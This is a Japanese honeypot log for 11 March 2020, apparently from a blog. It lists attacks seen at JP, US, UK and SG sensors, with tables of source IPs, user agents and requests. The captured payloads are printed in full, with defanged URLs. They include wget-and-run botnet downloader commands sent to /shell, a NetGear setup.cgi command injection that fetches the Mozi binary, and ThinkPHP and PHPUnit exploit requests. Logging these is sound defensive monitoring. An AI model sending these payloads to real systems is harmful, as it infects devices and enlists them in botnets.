ハニーポット(仮) 観測記録 2020/03/11分です。
特徴
Location:JP
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Polycom製品のマスタ設定ファイルへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
112[.]124[.]42[.]80に関する不正通信
Gh0stRATのような動き
を確認しました。
Location:US
Huaweiルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
botnetによるスキャン行為
ZmEuによるスキャン行為
phpMyAdminへのスキャン行為
112[.]124[.]42[.]80に関する不正通信
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//45[.]148[.]10[.]194/arm7; chmod 777 arm7; ./arm7 rep.arm7
Location:UK
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//45[.]148[.]10[.]194/arm7; chmod 777 arm7; ./arm7 rep.arm7
Location:SG
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
botnetによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//45[.]148[.]10[.]194/arm7; chmod 777 arm7; ./arm7 rep.arm7
他
アクセス数推移
JP:総アクセス数:271 (前日比:+188)
US:総アクセス数:46 (前日比:-14)
UK:総アクセス数:27 (前日比:-4)
SG:総アクセス数:29 (前日比:-1)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 117.239.149.94 | India |
5 | 172.104.251.46 | United States |
1 | 192.241.228.153 | United States |
1 | 192.241.233.165 | United States |
1 | 222.186.19.221 | China |
4 | 43.245.222.163 | Malaysia |
17 | 44.224.22.196 | United States |
17 | 44.225.84.206 | United States |
5 | 5.101.0.209 | Russia |
1 | 60.191.52.254 | China |
101 | 63.193.45.10 | United States |
14 | 66.70.164.168 | Canada |
1 | 67.205.164.20 | United States |
101 | 77.20.90.248 | Germany |
1 | 85.93.20.70 | Germany |
UserAgent一覧
件数 | UserAgent |
---|---|
43 | - |
14 | AWS Security Scanner |
1 | Go-http-client/1.1 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
202 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
2 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | Gh0st\xad | ||
1 | HELP | ||
1 | \x03 | ||
11 | \x16\x03\x01 | ||
1 | \x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n | ||
1 | \xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n | ||
10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
1 | GET | /.well-known/security.txt | HTTP/1.1 |
1 | GET | /000000000000.cfg | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /cfg/000000000000.cfg | HTTP/1.1 |
1 | GET | /config/000000000000.cfg | HTTP/1.1 |
1 | GET | /dms/000000000000.cfg | HTTP/1.1 |
1 | GET | /dms/Polycom/000000000000.cfg | HTTP/1.1 |
1 | GET | /dms/Polycom5000/000000000000.cfg | HTTP/1.1 |
1 | GET | /dms/Polycom_VVX101/000000000000.cfg | HTTP/1.1 |
1 | GET | /dms/polycom7000/000000000000.cfg | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
202 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /polycom/000000000000.cfg | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /pps/aastra/000000000000.cfg | HTTP/1.1 |
1 | GET | /prov/000000000000.cfg | HTTP/1.1 |
1 | GET | /prov/charmingsh/aastra/000000000000.cfg | HTTP/1.1 |
1 | GET | /provision/000000000000.cfg | HTTP/1.1 |
1 | GET | /pv/000000000000.cfg | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /sitemap.xml | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
1 | HEAD | http[:]//112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 104.248.28.188 | United States |
10 | 129.204.106.181 | China |
1 | 132.255.216.120 | Brazil |
2 | 172.104.242.173 | United States |
5 | 172.105.120.74 | United States |
7 | 2.139.230.243 | Spain |
1 | 222.186.19.221 | China |
1 | 46.174.115.14 | Russia |
10 | 47.98.236.31 | China |
1 | 60.191.52.254 | China |
1 | 61.219.11.153 | Taiwan |
4 | 81.17.16.100 | Switzerland |
1 | 83.252.9.54 | Sweden |
1 | 95.123.95.109 | Spain |
UserAgent一覧
件数 | UserAgent |
---|---|
10 | - |
3 | Go-http-client/1.1 |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 |
18 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
4 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729) |
6 | ZmEu |
1 | botnet/2.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
3 | - | ||
1 | Gh0st\xad | ||
1 | HELP | ||
1 | \x16\x03\x01 | ||
1 | \x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc | ||
1 | \xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff | ||
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
1 | GET | /MyAdmin/index.php | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /TP/html/public/index.php | HTTP/1.1 |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
2 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | /html/public/index.php | HTTP/1.1 |
3 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/index.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
2 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;+rm+-rf+*;+wget+http[:]//45[.]148[.]10[.]194/arm7;+chmod+777+arm7;+./arm7+rep.arm7 | HTTP/1.0 |
2 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | HTTP/1.1 | |
1 | GET | http[:]//check2[.]zennolab[.]com/proxy.php | HTTP/1.1 |
1 | HEAD | http[:]//112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
1 | POST | /ctrlt/DeviceUpgrade_1 | HTTP/1.1 |
2 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
6 | 110.249.212.46 | China |
1 | 14.249.144.207 | Vietnam |
1 | 172.104.242.173 | United States |
1 | 175.4.215.163 | China |
1 | 187.45.100.215 | Brazil |
1 | 188.166.78.60 | Netherlands |
1 | 190.151.169.213 | Argentina |
1 | 192.241.192.141 | United States |
1 | 192.241.211.37 | United States |
5 | 193.57.40.38 | Ukraine |
1 | 222.186.19.221 | China |
5 | 5.101.0.209 | Russia |
1 | 80.82.70.118 | Netherlands |
1 | 85.93.20.70 | Germany |
UserAgent一覧
件数 | UserAgent |
---|---|
10 | - |
1 | Go-http-client/1.1 |
2 | Mozilla/5.0 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 |
2 | Mozilla/5.0 zgrab/0.x |
1 | botnet/2.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | \x03 | ||
1 | \x16\x03\x02\x01o\x01 | ||
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
2 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;+rm+-rf+*;+wget+http[:]//45[.]148[.]10[.]194/arm7;+chmod+777+arm7;+./arm7+rep.arm7 | HTTP/1.0 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
6 | GET | http[:]//110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 104.248.28.188 | United States |
1 | 116.99.213.10 | Vietnam |
1 | 159.203.196.79 | United States |
5 | 165.22.70.143 | United States |
1 | 172.104.242.173 | United States |
1 | 177.155.36.125 | Brazil |
1 | 178.128.236.241 | Canada |
1 | 192.241.234.193 | United States |
5 | 193.57.40.38 | Ukraine |
1 | 222.186.19.221 | China |
1 | 37.34.185.174 | Kuwait |
5 | 5.101.0.209 | Russia |
4 | 81.17.16.100 | Switzerland |
1 | 85.93.20.70 | Germany |
UserAgent一覧
件数 | UserAgent |
---|---|
7 | - |
1 | Go-http-client/1.1 |
2 | Mozilla/5.0 |
10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 |
4 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729) |
1 | Mozilla/5.0 zgrab/0.x |
2 | botnet/2.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | Gh0st\xad | ||
1 | HELP | ||
1 | \x03 | ||
1 | \x16\x03\x01 | ||
1 | \x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc | ||
1 | \xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff | ||
1 | CONNECT | ip[.]ws[.]126[.]net:443 | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /MyAdmin/index.php | HTTP/1.1 |
1 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /hudson | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /pma/index.php | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
1 | GET | /shell | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
2 | GET | /shell?cd+/tmp;+rm+-rf+*;+wget+http[:]//45[.]148[.]10[.]194/arm7;+chmod+777+arm7;+./arm7+rep.arm7 | HTTP/1.0 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |